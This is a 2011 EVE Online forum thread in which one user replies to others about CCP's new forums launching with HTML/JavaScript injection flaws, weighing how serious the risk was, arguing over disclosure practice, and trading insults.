| Author |
Thread Statistics | Show CCP posts - 36 post(s) |
dexington
Caldari
Baconoration
   |
Posted - 2011.04.10 00:02:00 -
[1]
 Originally by: Froosh
It took CCP eighteen months to make a skin for an open source forum.
CCP - 13 148 man hours doing nothing.
They most have used some time on removing what every security features the forums had...
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 00:38:00 -
[2]
Originally by: Durzel
If Sreegs isn't a web developer then how can you expect him to know whether something is exploitable or not?
If you can manipulate data cross accounts just by editing ids in the url, someone in charge of security should probably realize that the system lacks any form of effective user authentication. It may not by Sreegs job to do the testing, but somewhere down the line it has be someones job to make sure the testing gets done...
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 00:47:00 -
[3]
Originally by: Mortania
But, in all seriousness. It sucks that you guys all had to come in on a weekend to try and fix some damned forums.
Most other companies deploy new code in the middle of the week, they could have done the same...
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 00:57:00 -
[4]
Originally by: Akita T
how about an assurance that user feedback will be actually USED next time you ask us to test the forums ?
eve user feedback... 50% says the font is to small, 50% says it's not big enough... 50% says the background color should be black, 50% says it should be white...
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 01:04:00 -
[5]
Originally by: Copine Callmeknau
The new forums should have everything the old forums have and more. Not a mixed bag of dubious features coupled with reduced functionality. Patience is not something you guys need to worry about here, we don't care if it gets released late so long as it's better, and that it WORKS when it gets released.
Except form the security being non existing, the forums was ready for use no reason not to release them.
Originally by: Copine Callmeknau
Oh and an option for an ultra low bandwidth (no avatars, plain black background, no animations etc) mode would be great, I'm paying by the kb here and while I like the new look of the forum, sometimes I wanna post without chewing through my internet.
Disable images in you browser if it's that big a problem...
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 01:12:00 -
[6]
Originally by: Mortania
Originally by: dexington
Except form the security being non existing, the forums was ready for use no reason not to release them.
You're a moron. img support, sigs, color support, read/unread posts, understandable last read functionality, like system, all broken.
And I'm not bringing in the visual items others complain about, because I found them mostly to be better.
NO UOI A MOROMN!!!!!
I had no problems with the new forums, some things seemed not 100% there yet and some features were missing, but it worked for me.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 04:25:00 -
[7]
Originally by: Fearless M0F0
Btw, storing sensitive data such as my char id in unencrypted cookies?  . Do they know about the ASP.NET Session object?
Are you talking about the charid, everyone can see by mouse over you picture her on the forums?
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 10:59:00 -
[8]
Originally by: Bomberlocks
The problem is that an injected keylogger could conceivably get hold of your forum username and password.
Not going to happen without the user downloading and installing the program, you canŠt just inject a running keylogger using html. Unless the attack is exploiting over security hole in the browser, it would be much the same as linking url to malware on this forum.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 11:18:00 -
[9]
Edited by: dexington on 10/04/2011 11:19:45
Originally by: Grimpak
Quote:
The new EVE forums need a special plugin to read them. Install? <yes> <no>.
I think this type of attack is conceivable with the html vulnerabilities that existed on the forum.
Even if this is possible you would still need to download the software from another server, and run it yourself. Their would be not automated installation and execution of the keylogger.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 11:58:00 -
[10]
Originally by: Kerfira
Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup?
That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts...
Probably not as many as you think, everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, i'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right.
It is problem that you could inject html into the page, and it does open up for some types of attack chains. On the other hand it's not something that is easily exploited to gain full system access, it's a ncommon type of security flaw and it is considered a minor one.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 12:10:00 -
[11]
Originally by: Bomberlocks
You don't need to download any software since the keylogger is done in javascript.
Was anyone able to inject js code?, i didn't see anything working except html.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 12:37:00 -
[12]
Originally by: Bomberlocks
Originally by: dexington
Originally by: Bomberlocks
You don't need to download any software since the keylogger is done in javascript.
Was anyone able to inject js code?, i didn't see anything working except html.
How do you think the html was injected? 
You make it sound like js was used to inject html, how do you inject js when you can't inject html?
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.10 14:53:00 -
[13]
Originally by: CCP Sreegs
I'm not claiming. I'm stating outright that customer data was never at risk. We've also said there will be a blog which will detail what occurred and what was wrong.
If i remember correct the "EVE Technology Lab" forums had posts with people posting links to 3 party tools, and with people being able to edit all posts it would be possible to change the links without the users downloading the tools noticing the change.
Have you been able to verify that no data tempering was going on while the forums was online, else everyone who download any program using links from the forums could potentially be at risk of running modified versions.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 13:31:00 -
[14]
Originally by: MisterAl tt1
To allow code insertion into signatures! What kind of "specialists" work there?! How could've you bring OUR computers under such a risk?!
Well, I'm sure CCP will state everything is OK and there was no risk. Even with my little knowledge I can say that they LIE.
hahah... you better format you computer, to be sure there is no malware installed. Remember to turn off your computer for 45 min after the format, just to be sure nothing survives in memory!
anyways, when do we see the dev blog?, can someone confirm the rumors that the head of security called in sick today?
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 13:45:00 -
[15]
Originally by: MisterAl tt1
Meaning "let it slide and let CCP don't bother about doing some non-professional work again" ? No. I want CCP to see that users ARE interested in seeing CCP really do something like they should.
You just want to ***** and whine, did someone put chilly on your tampax or what?
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 14:37:00 -
[16]
Originally by: MisterAl tt1
Trolls damage controling CCP ? How nice.
You don't seem to understand troll culture, they are the superheros of the internet, fighting to save the internet from people like you!
Every time to many self-righteous, to stupid to know better, angry forum warriors gather for a session of group jerking, while discussing some crack pot theory, eg. how html/javascript injection in mmo forums is going to change the world as we know it, what's when the superhero troll emerge to try and save the internet from stupidity.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 14:40:00 -
[17]
Originally by: Hel O'Ween
Originally by: Miilla
Given the attitude this guy has, he probably wrote it in rage speak in the email and bug report with l33t too. I can see why it would be downgraded or ignored.
Granted, Cat isn't a trained diplomat, but he has been a helpful member of the 3rd party dev community over the years. Just check out the Tech Lab forums for his posts, before you make any wild assumptions.
And if you as a company ignore a bug report about a serious security issue because you don't like "the sound" of it, you're doing it terribly wrong.
A. ****** was also a productive member of society as a youth, no one really seemed to care about that after WW2.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 14:45:00 -
[18]
Edited by: dexington on 11/04/2011 14:45:06
Originally by: Miilla
When you write a bug, write it clear and concise and include the impact. you dont run off in an ego tantrum...
Finding security bugs is all about showing the other guy you know more about programming and it-tech then he does, the world needs to know when you are better then someone else.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 14:52:00 -
[19]
Edited by: dexington on 11/04/2011 14:52:10
Originally by: Miilla
That is why those people never make management or lead positions as they cannot handle the decision process and lack maturity in the thinking. The higher up you go the more it becomes less a technical decision and more a business decision. Learn that and you will go far otherwise you end up sitting in your cage competing with students (cheaper and work longer hours). True fact of employment.
You make it sounds like that's a bad thing, you can easily get a salary where money is not a big deal without being in management, and you don't have to do the meeting and the hierarchical butt kissing... not being in management is win/win.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 15:13:00 -
[20]
Originally by: Niraia
I'm trying to figure out what the business reasons for releasing a forum replacement that wasn't tested for security are, but I can't.
Maybe they were behind schedule, and then asked if they were ready to deploy someone took a chance and said yes. ItŠs always the last 10% that takes 90% of the time, it's so much easier to do the last changes/fixes when you have user feedback/test data from a running system, someone probably believed the last fixes and changes could be applied to the deployed system. Probably would even have been a good idea, had it not been security issues they needed to fix.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 16:21:00 -
[21]
Originally by: Zey Nadar
Don't you see Miilla is a professional troll? Youve been trolled! Above post proves it.
ZOMG!1 you are so off topic, you must be one of the trolls in cohorts with Miilla, i see right through your trolling disguised as counter trolling.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 17:22:00 -
[22]
Originally by: Hel O'Ween
After no action has been taken by CCP, he demonstrated the security problems. This is common practice.
Common practice would be to wait with public disclouser, until it's confirmed that the issue is solved. Hacking into a website no matter what the reason is a crime, in most parts of the world.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 20:51:00 -
[23]
Originally by: phintais
I can't find anyone online that likes the new forums.
I liked the new forums.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 21:16:00 -
[24]
Originally by: Sullen Skoung
Has Sreegs posted that blog yet?
They kicked him out before he had time to write it.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.11 23:38:00 -
[25]
Originally by: Calathea Sata
They need another 72,000 man hour... to fix the problems they have created. So here goes another 18 months!
I donŠt believe you!
After multiple threads about you are leaving the game you are still here, how can you except anyone to ever believe anything you say?.
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.12 02:49:00 -
[26]
Originally by: Marwood Ford
You are leaving the failboat though, right?
Seems like she got off the fail boat, and jumped on the attention ***** train...
|
dexington
Caldari
Baconoration
|
Posted - 2011.04.12 12:01:00 -
[27]
Originally by: Kristina Vanszar
Edited by: Kristina Vanszar on 12/04/2011 10:05:00
The DEV BLOG,
not at risk, sorry guys this must be joke, as you've said, it was possible to include HTML.
Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, and gather a some login informations???
OR, add a HTML or even Iframe which calls an external script?
Sorry, but i do not belive that devblog....
Just as an sidetip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
lol, who would stop you from using that bug to launching some nukes... we better call the pentagon right away, and make them aware of the danger.
|
| |
|